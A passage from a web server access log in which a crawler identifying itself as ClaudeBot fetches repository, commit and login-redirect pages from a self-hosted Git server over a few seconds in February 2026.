Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 11756] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 820] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fupdate_status.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2F.TemporaryDocument%2Fclaude.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 9773] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Flib64" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Frequirements.txt" [Client 216.73.216.188] [Length 24205] [Gzip 3.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FOpcUaMinimal.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fupdate_status.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2FREADME.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fapp" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2FupdateRecord.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Fbf87175f515287fd25d175843915ffa6178025eb" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Ffind%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2F.Notebook%2FOpcTest%2520program%2520by%2520claude.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 216.73.216.188] [Length 10905] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fmain.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py?display=rendered" [Client 216.73.216.188] [Length 10897] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Ffind%2Fcommit%2F18fa480c84b358da8bf50d54057f53591759225f" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2Fassets" [Client 216.73.216.188] [Length 22218] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fletsencrypt%2Frenewal" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 11127] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2Fglobal.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService%2Fobj%2FTestService.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 21841] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fbf87175f515287fd25d175843915ffa6178025eb%2Fasset_pilot_docker%2Fapp" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Ffind%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcompare%2Fmain...a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html%2Fassets" [Client 216.73.216.188] [Length 19243] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2F.TemporaryDocument%2FQUICKSTART.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64?display=rendered" [Client 216.73.216.188] [Length 11195] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fnginx.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" [Client 216.73.216.188] [Length 10145] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" [Client 216.73.216.188] [Length 9859] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx?display=rendered" [Client 216.73.216.188] [Length 10976] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2FDockerfile" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf?display=rendered" [Client 216.73.216.188] [Length 10848] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2F18fa480c84b358da8bf50d54057f53591759225f" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 216.73.216.188] [Length 11311] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" [Client 216.73.216.188] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fapp%2Fcalculator.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fbf87175f515287fd25d175843915ffa6178025eb%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Ftemplates%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" [Client 216.73.216.188] [Length 248] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr 